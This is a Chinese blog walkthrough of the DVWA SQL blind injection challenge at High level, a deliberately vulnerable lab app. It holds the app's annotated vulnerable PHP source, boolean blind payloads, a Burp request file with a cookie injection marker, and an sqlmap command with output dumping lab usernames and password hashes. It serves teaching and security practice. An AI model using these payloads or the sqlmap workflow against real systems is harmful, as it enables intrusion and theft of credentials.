DVWA靶场通关笔记-SQL盲注(SQL Injection Blind High级别)

最新推荐文章于 2025-07-13 19:33:21 发布
最新推荐文章于 2025-07-13 19:33:21 发布
阅读量789 收藏 28
点赞数 17
CC 4.0 BY-SA版权
分类专栏: DVWA靶场 文章标签: DVWA靶场 SQL注入漏洞 SQL盲注 布尔盲注 数据库 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/147993315

目录

一、SQL盲注

二、代码审计(High级别)

1、index.php

2、High.php

3、渗透思路

(1)SQL安全问题分析

(2)SQL渗透思路

三、渗透准备

1、配置security为低等High级别。

2、配置字符集一致

四、渗透实战

1、判断注入类型

2、sqlmap渗透测试

(1)bp抓包

(2)sqlmap渗透

DVWA(Damn Vulnerable Web Application)中的 SQL Injection(Blind)布尔盲注关卡是用于练习和演示 SQL 盲注攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对高等级别的关卡进行渗透实战。

一、SQL盲注

SQL 盲注是 SQL 注入攻击的一种特殊形式,当应用程序执行 SQL 查询后不返回具体数据,但会通过页面显示状态差异(如返回内容是否存在、响应时间长短)间接暴露一些信息。攻击者无法直接看到查询结果,需通过构造包含逻辑条件(如AND/OR)或时间延迟(如sleep()函数)的SQL语句,逐次枚举来推断数据库内容。以布尔盲注为例,手工渗透步骤如下所示。

步骤描述示例
验证注入点构造特殊输入,根据返回结果判断是否存在注入点

输入:id=1 or 1=1#,预期返回成功信息;

输入:id=1 or 1=2#,预期返回失败信息

枚举数据库名长度通过比较数据库名长度来确定具体长度id=1 and length(database())=8 #(假设数据库名长度为 8)
枚举数据库名逐字符猜测数据库名

id=1 and substr(database(),1,1)='d' #

(猜测数据库名第一个字符为 'd')

枚举表名判断指定表名是否存在id=1 AND EXISTS(SELECT * FROM information_schema.tables WHERE table_name='users' ) #(判断是否存在名为 'users' 的表)
枚举列名判断指定列名是否存在

id=1 AND EXISTS(SELECT username FROM users) #

(判断 'users' 表中是否存在 'username' 列)

枚举数据逐字符猜测元素的值

id=1 AND substr((SELECT username FROM users LIMIT 0,1),1,1)='a' #

(猜测 'users' 表中第一条记录的 'username' 列第一个字符为 'a')

二、代码审计(High级别)

1、index.php

进入DVWA靶场源目录,找到index.php源码。

这段 PHP 代码是 Damn Vulnerable Web Application (DVWA) 中 SQL盲注演示页面的主控制器,根据用户设置的安全级别(低 / 中 / 高 / 安全)加载不同级别安全成都程度的代码,通过表单让用户输入或选择用户 ID,动态生成页面并展示查询结果,同时检测 PHP 不安全配置并提供 SQL 注入学习资源链接,用于演示不同防护等级下的盲注攻击场景及防御方式。

经过注释后的详细代码如下所示。

<?php
// 定义网站根目录路径常量,用于后续文件引用
define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
// 引入DVWA页面基础功能库
require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';

// 启动页面,验证用户是否已认证并初始化PHPIDS(入侵检测系统)
dvwaPageStartup( array( 'authenticated', 'phpids' ) );

// 创建新页面实例
$page = dvwaPageNewGrab();
// 设置页面标题
$page[ 'title' ]   = 'Vulnerability: SQL Injection (Blind)' . $page[ 'title_separator' ].$page[ 'title' ];
// 设置页面ID,用于导航和标识
$page[ 'page_id' ] = 'sqli_blind';
// 添加帮助按钮和源代码按钮
$page[ 'help_button' ]   = 'sqli_blind';
$page[ 'source_button' ] = 'sqli_blind';

// 连接数据库
dvwaDatabaseConnect();

// 设置HTTP请求方法(默认为GET)
$method            = 'GET';
// 初始化不同安全级别对应的源文件
$vulnerabilityFile = '';

// 根据安全级别Cookie值选择不同的实现文件
switch( $_COOKIE[ 'security' ] ) {
	case 'low':
		// 低安全级别:存在明显SQL注入安全风险
		$vulnerabilityFile = 'low.php';
		break;
	case 'medium':
		// 中安全级别:部分防御措施,使用POST方法和下拉菜单
		$vulnerabilityFile = 'medium.php';
		$method = 'POST';
		break;
	case 'high':
		// 高安全级别:增强防御,但仍可能存在安全风险
		$vulnerabilityFile = 'high.php';
		break;
	default:
		// 安全模式:使用预处理语句,理论上无SQL注入风险
		$vulnerabilityFile = 'impossible.php';
		break;
}

// 引入选定的实现文件
require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/sqli_blind/source/{$vulnerabilityFile}";

// 检查PHP配置中的安全风险
$WarningHtml = '';
// 检测Magic Quotes是否启用(已弃用的安全机制)
if( ini_get( 'magic_quotes_gpc' ) == true ) {
	$WarningHtml .= "<div class=\"warning\">The PHP function \"<em>Magic Quotes</em>\" is enabled.</div>";
}
// 检测Safe Mode是否启用(已弃用的安全机制)
if( ini_get( 'safe_mode' ) == true ) {
	$WarningHtml .= "<div class=\"warning\">The PHP function \"<em>Safe mode</em>\" is enabled.</div>";
}

// 构建页面主体内容
$page[ 'body' ] .= "
<div class=\"body_padded\">
	<h1>Vulnerability: SQL Injection (Blind)</h1>

	{$WarningHtml}

	<div class=\"vulnerable_code_area\">";

// 根据不同安全级别显示不同的用户交互界面
if( $vulnerabilityFile == 'high.php' ) {
	// 高级别安全:通过JavaScript弹窗设置用户ID
	$page[ 'body' ] .= "Click <a href=\"#\" onclick=\"javascript:popUp('cookie-input.php');return false;\">here to change your ID</a>.";
}
else {
	// 低、中级别安全:显示表单让用户输入ID
	$page[ 'body' ] .= "
		<form action=\"#\" method=\"{$method}\">
			<p>
				User ID:";
				
	// 中级别安全:使用下拉菜单限制用户选择范围
	if( $vulnerabilityFile == 'medium.php' ) {
		$page[ 'body' ] .= "\n				<select name=\"id\">";
		// 查询用户数量用于生成下拉选项
		$query  = "SELECT COUNT(*) FROM users;";
		$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
		$num    = mysqli_fetch_row( $result )[0];
		$i      = 0;
		// 动态生成下拉选项(1到用户总数)
		while( $i < $num ) { $i++; $page[ 'body' ] .= "<option value=\"{$i}\">{$i}</option>"; }
		$page[ 'body' ] .= "</select>";
	}
	else
		// 低级别安全:允许用户自由输入
		$page[ 'body' ] .= "\n				<input type=\"text\" size=\"15\" name=\"id\">";

	$page[ 'body' ] .= "\n				<input type=\"submit\" name=\"Submit\" value=\"Submit\">
			</p>\n";

	// 安全模式:添加CSRF防护令牌
	if( $vulnerabilityFile == 'impossible.php' )
		$page[ 'body' ] .= "			" . tokenField();

	$page[ 'body' ] .= "
		</form>";
}

// 显示查询结果(由引入include的指定文件生成)
$page[ 'body' ] .= "
		{$html}
	</div>

	<h2>More Information</h2>
	<ul>
		// 提供SQL注入相关的参考链接
		<li>" . dvwaExternalLinkUrlGet( 'http://www.securiteam.com/securityreviews/5DP0N1P76E.html' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( 'http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( 'http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Blind_SQL_Injection' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( 'http://bobby-tables.com/' ) . "</li>
	</ul>
</div>\n";

// 输出最终HTML页面
dvwaHtmlEcho( $page );

?>

2、High.php

进入DVWA靶场源目录,找到High.php源码,具体如下所示。

打开源码low.php,分析可知这段代码实现了用户 ID 验证功能,如下所示。 

对比low关卡,最主要的区别是注入点变为了cookie方式传入,源码对比如下所示。

high.php代码的功能如下所示。

  • 检查是否通过 POST 方法提交了表单。
  • 从 POST 参数中获取用户输入的 ID,并使用mysqli_real_escape_string函数进行转义处理。
  • 构建 SQL 查询语句,将转义后的用户输入 ID 拼接到 SQL 中,查询users表中是否存在该用户 ID。
  • 执行 SQL 查询,并获取查询结果的行数。
  • 根据查询结果行数判断用户是否存在,并返回相应的反馈信息。

不过代码具有SQL注入风险,具体如下所示。

  • 虽然使用了mysqli_real_escape_string函数对用户输入进行转义处理,但这种转义并非万无一失。如果攻击者能够绕过转义机制,仍然可以构造恶意的 SQL 语句。
  • 代码中没有对用户输入进行严格的格式验证,例如限制输入必须为数字等。这使得攻击者有可能输入非数字字符,从而导致 SQL 注入安全风险。

详细注释后的代码如下所示。

<?php
// 检查是否存在名为'id'的Cookie
if( isset( $_COOKIE[ 'id' ] ) ) {
    // 从Cookie中获取用户ID
    $id = $_COOKIE[ 'id' ];

    // 构造SQL查询语句,直接将Cookie中的ID拼接到SQL字符串中(单引号包裹)
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    // 执行SQL查询,移除'or die'以隐藏数据库错误信息
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid );

    // 获取查询结果行数,@符号抑制可能的错误提示
    $num = @mysqli_num_rows( $result );

    if( $num > 0 ) {
        // 用户存在时返回固定提示
        $html .= '<pre>User ID exists in the database.</pre>';
    } else {
        // 随机睡眠2-4秒(概率20%),增加时间盲注难度
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }
        // 返回404状态码和用户不存在提示
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
        $html .= '<pre>User ID is MISSING from the database.</pre>';
    }

    // 关闭数据库连接
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

3、渗透思路

(1)SQL安全问题分析

本关卡具有布尔注入的可能性,原因如下所示。

  • 未对 Cookie 输入进行过滤 / 转义
    • 直接将$_COOKIE['id']拼接到 SQL 语句中(单引号包裹),未使用mysqli_real_escape_string等函数转义,导致攻击者可通过闭合单引号构造恶意 SQL
    • 源码中加入了 LIMIT 1,来限制查询更多的数据,但是可以通过使用#注释符号绕过。
  • 基于布尔结果的状态反馈
    • 查询成功时返回固定内容(User ID exists),失败时返回 404 MISSING,形成明确的布尔响应差异,可用于布尔盲注。
  • 可控的时间延迟(部分场景)
    • 未查询到用户时,通过rand()sleep()随机添加延迟(约 20% 概率)。虽增加盲注难度,但攻击者仍可通过大量请求统计规律,利用时间盲注绕过。虽然通过 sleep() 函数来造成查询不到数据时随机延时,从而扰乱基于延时的 SQL 盲注,不使用时间盲注,还是可以使用布尔型注入方法。

(2)SQL渗透思路

原始SQL语句:SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;

注入语句:输入1' OR 1=1#会导致 SQL 变为如下内容。

SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1=1#' LIMIT 1由于1=1恒为真,且#注释掉后面的单引号 limit1,该查询会返回所有用户记录,是可以查询到记录的情况。

三、渗透准备

1、配置security为High级别。

进入到SQL Injection(Blind)关卡high页面,完整URL地址具体如下所示。

http://192.168.59.1/dvwa/vulnerabilities/sqli/

相对于low关卡可以自主输入id值,medium只能通过下拉框选择固定的几个id值,high关卡则是通过打开如下红框链接后,弹出框内输入id来查询信息。 

2、配置字符集一致

参考SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法-CSDN博客

为避免使用联合注入法时报错“Illegal mix of collations for operation 'UNION'”,修改dvwa数据库user表的first_name与last_name字符集,如下图所示。

修改dvwa数据库user表的password字符集,如下图所示。

四、渗透实战

1、判断注入类型

进入到SQL盲注high关卡,根据源码分析我们知道此关卡使用 cookie 来传递 ID 值,另外输入框和输出内容不在同一页面,具体如下所示。

开启bp拦截,选择参数1,显示“User ID exists in the database.”

由于注入点参数为cookie,为方便渗透,使用burpsuite进行后续渗透,使用bp抓到此报文,发送到repeater。

将报文发送到repeater,如下图所示红色框内为注入点,具体如下所示。

注入点id部分改为1' or 1=1#,没有显示所有列表,而是显示“User ID exists in the database.”。

注入点id部分改为不存在的id,-1,显示“User ID is MISSING from the database”,具体如下所示。

注入点id部分改为-1',这种会导致数据库报错的注入语句,仍然提示“User ID is MISSING from the database”,具体如下所示。

说明这是布尔型注入,正确执行显示“User ID exists in the database.”,错误时显示“User ID is MISSING from the database”,这与源码分析的结果一致。

2、sqlmap渗透测试

(1)bp抓包

由于DVWA需要登录后才能使用,故而不可以直接是用sqlmap直接渗透,bp抓包,找到上一步渗透的报文,右键copy to file,具体如下所示。

将报文另存为sql-high.txt,具体如下所示。

打开sql-high.txt,修改为如下内容,注意在id赋值后面加上'*#,指明注入点的位置。

GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1
Host: 192.168.59.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.59.1/dvwa/security.php
Cookie: id=1'*#; security=high; PHPSESSID=tssqfshe2838kcg5nbkf4464u3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

(2)sqlmap渗透

注入命令如下所示,注意增加了参数not-string指明查询错误时的关键字。

sqlmap -r sql-high.txt --current-db --batch --dump --technique=B --not-string="MISSING"

渗透结果如下所示,成功获取到user表的所有内容。

[11:17:41] [INFO] checking if the injection point on (custom) HEADER parameter 'Cookie #1*' is a false positive
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 32 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6092=6092#; security=high; PHPSESSID=tssqfshe2838kcg5nbkf4464u3
--- 
[11:17:41] [INFO] testing MySQL
[11:17:41] [INFO] confirming MySQL
[11:17:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.0.0
[11:17:41] [INFO] fetching current database
[11:17:41] [INFO] retrieved: dvwa
current database: 'dvwa'
Database: dvwa                                                                                                                                                                                                                            
Table: users
[5 entries]
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user    | avatar                      | password                                    | last_name | first_name | last_login          | failed_login |
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 3       | 1337    | /hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2025-05-15 09:56:46 | 0            |
| 1       | admin   | /hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2025-05-15 09:56:46 | 0            |
| 2       | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2025-05-15 09:56:46 | 0            |
| 4       | pablo   | /hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2025-05-15 09:56:46 | 0            |
| 5       | smithy  | /hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2025-05-15 09:56:46 | 0            |
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
SQL注入-布尔盲注与时间
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、的分类 基于布尔类型的 基于时间类型的 三、利用
DVWA靶场通关(2023)
2301_80548709的博客
02-23 2796
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
SQL Injection (Blind)(原理、分类、利用)
Innocence_0的博客
04-14 1308
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为。在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,可分为两类:基于布尔的(Boolean based)基于时间的(Time based)
渗透测试实验_基于DVWASQL 安全等级Low Medium High
weixin_47133613的博客
03-20 5839
文章目录SQL1. SQL概述2. 基于布尔值的3. 前期实验准备4. Low等级5. Medium等级6. High等级 SQL 1. SQL概述 以下内容引用自《SQL(原理概述、分类): 即在SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或尝试,这个过程成为 如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的来获取信息。 是不能通过直接显示的途径来获取数
DVWA靶场通关笔记-SQL(SQL Injection Blind low级别)
mooyuan的网络安全博客
07-08 1038
DVWA(Damn Vulnerable Web Application)中的 SQL Injection(Blind)布尔盲注关卡是用于练习和演示 SQL 攻击的不同场景,不同安全等级存在不同的风险和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA靶场通关笔记-SQL(SQL Injection Blind Medium级别)
mooyuan的网络安全博客
07-08 943
DVWA(Damn Vulnerable Web Application)中的 SQL Injection(Blind)布尔盲注关卡是用于练习和演示 SQL 攻击的不同场景,不同安全等级存在不同的风险和绕过方法,本小节对中等级别的关卡进行渗透实战。
DVWA靶场通关手册(万字图文解析)
Blanks的博客
01-18 3583
DVWA靶场通关手册(万字图文解析),通过教程+知识点总结复习,干货满满,快快收藏!!
DVWA靶场分析笔记
RestoreJustice的博客
03-16 1299
用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带Sesion去访问,是用户的身份令牌。sessionID作为特定用户访问站点所需要的唯一内容。如果能够计算或轻易猜到该sessionID,则攻击者将可以轻易获取访问限,无需录直接进入特定用户界面,进而进行其他操作。用户访问服务器的时候,在服务器端会创建一个新的会话(Session),会话中会保存用户的状态和相关信息,用于标识用户。
DVWA通关攻略零到一【全】
热门推荐
WX公众号-小白学安全
10-28 7万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA靶场通关笔记
博客
04-25 1949
Brute Force(暴力破解) Command Injection(命令注入) low: Medium: High: CSRF(跨站请求伪造漏洞) File Inclusion(文件包含漏洞) File upload(文件上传漏洞) SQL InjectionSQL注入) union联合查询 报错注入 时间 SQL Injection (Blind)SQL布尔盲注 时间 XSS( Reflected)(xss反射型) XSS(Stored)(x...
WebLogic 作用,以及漏洞原理,流量特征与防御
LIU6636LIU的博客
07-10 345
WebLogic作为企业级Java应用服务器,提供应用部署、事务管理、集群负载等核心功能,广泛应用于金融、电信等关键领域。该服务器存在T3/IIOP反序列化、未授权访问等高危漏洞,攻击者可实现远程代码执行、服务器控制(删库/后门)、数据窃取、挖矿及内网渗透等危害。典型攻击流量具有特定协议特征。防御建议包括:禁用高危协议、及时补丁更新、配置WAF、加强流量监控和实施最小权限原则,以保障系统安全。
java进阶(二)+学习笔记
最新发布
weixin_41330897的博客
07-13 1017
面向对象设计以类和对象为核心,通过封装隐藏细节、继承实现复用、多态单一职责(一个类只做一件事)、开闭原则(扩展开放/修改关闭)、接口隔离(细化接口功能)、依赖倒置(面向抽象编程)、组合复用(优先组合而非继承)、里氏替换(子类可无缝替换父类)、迪米特法则(减少对象直接耦合),这些原则共同指导构建高内聚、低耦合、易维护的软件系统。
第五章 RAG知识库进阶
weixin_45284646的博客
07-12 281
本文介绍了基于Spring AI框架开发RAG(检索增强生成)知识库应用的核心技术与实践要点。主要内容包括:1)RAG工作流程的四个关键环节(文档收集切割、向量转换存储、文档过滤检索、查询增强关联);2)Spring AI的ETL(抽取、转换、加载)流程实现,重点解析了DocumentReader组件对不同格式文档(JSON、PDF等)的读取方式;3)文档转换(切片)阶段的DocumentTransformer接口应用。文章通过代码示例展示了JsonReader的具体用法,为开发者提供了RAG应用开发的系统
将列表还原为树状结构
楠姐的博客
07-11 193
在需要存储树结构的情况下,一般由于使用的关系型数据库(如 MySQL),是以类似表格的扁平化方式存储数据。因此不会直接将树结构存储在数据库中,通常是通过邻接表、路径枚举、嵌套集或闭包表来存储。其中,邻接表是最常用的方案之一,其存储模型如下:大部分情况下,会交给应用程序来构造树结构。
包管理工具 snap 和 apt
2301_78094384的博客
07-13 261
APT与Snap包管理工具对比摘要 APT是Debian/Ubuntu的传统包管理系统(.deb格式),深度集成系统,版本稳定但较旧,依赖管理完善。Snap是容器化包管理系统(.snap格式),具备沙箱隔离、自动更新和跨发行版特性,版本更新但占用更多资源。主要区别:APT适合系统组件,强调稳定性;Snap适合获取新版应用。两者可共存,建议关键组件用APT,桌面/开发工具可选用Snap。可通过apt list和snap list命令查看已安装软件来源。
【实战】Dify从0到100进阶--文档解读(2)Agent和工作流
zkw54334的博客
07-12 388
特性ChatflowWorkflow定位面向多轮对话的流程化编排面向一次性/批量自动化任务的流程编排交互方式人–机多轮对话无需持续交互,仅流程节点执行终结形式最终返回一条或多条对话回复流程结束时不返回对话,而是完成后端任务或产出Chatflow通过“节点+分支”方式,把对话拆解成可视化的步骤,适合构建有条件判断、记忆管理的复杂对话体验。Workflow类似 Chatflow 的低代码编排,但不绑定用户对话,主要用于初始化脚本、数据处理、定时任务、报告生成等后台流程。
redis的一些疑问
07-11 262
什么时候会执行缓存移除呢?如果方法执行异常是否移除?如果缓存不存在还会移除么?这个移除会在redis的执行历史命令中监控到么?./redis-cli -a密码 MINITOR 监控redis的实时执行命令,大部分PING是类似心跳?使用这个实时监控命令,可以 使用grep管道过滤出指定的key来监控redis命令的执行第一次缓存存在的情况下,执行方法,会有一条del命令;第二次缓存不存在的情况下,执行方法,也会执行del命令;
postgre 14.3 安装postgis 扩展
qq_43224338的博客
07-11 186
进入数据库 执行下列sql 启用扩展后 重启pg即可。postgre 14.3 安装postgis 扩展。下载后安装过程需要选择适合使用配置文件。选择第二项即可 然后回车继续安装。
Oracle RAC 11.2.0.4 更新SYSASM和SYS密码
Albert Tan DBA之路
07-11 192
Oracle RAC 11.2.0.4 更新SYSASM和SYS密码
dvwa靶场sqlmedium级别
12-28
### DVWA SQL Blind Injection Medium Level Attack Method Tutorial In the context of DVWA (Damn Vulnerable Web Application), exploiting a SQL blind injection vulnerability at the medium difficulty level involves understanding how to interact with the application and craft specific payloads that can infer database structure or content based on true/false responses. The command provided serves as an example payload used within such attacks, specifically designed to retrieve table names from the current database schema by leveraging conditional logic in queries: ```sql select table_name from information_schema.tables where table_schema=database()[^1] ``` For executing this type of attack against DVWA's SQLi Blind challenge set to 'Medium', one approach is using automated tools like SqlMap which simplifies the process significantly. An invocation might look similar to what has been shared previously: ```bash py3 sqlmap.py -u "http://192.168.123.20/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=248dmjg65dksvfvf8kk0k7vqj0; security=low" --current-db[^2] ``` This tool automates much of the work involved in detecting vulnerabilities, extracting data through time-based boolean conditions without direct output feedback, and even taking over databases under certain circumstances—all while adhering to user-defined constraints regarding legality and ethics. When performing manual exploitation for educational purposes only, consider crafting custom scripts or modifying existing ones according to your environment setup. The key lies in constructing queries that cause different behaviors depending on whether they evaluate to true or false, allowing inference about underlying structures indirectly via side-channel observations. --related questions-- 1. How does changing the security level affect the effectiveness of SQL injection techniques? 2. What are some common defenses implemented against SQL injections? 3. Can you explain more about Information Schema Tables and their role in discovering database objects during penetration testing? 4. Are there any particular challenges associated with exploiting blind SQL injections compared to error-based methods?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值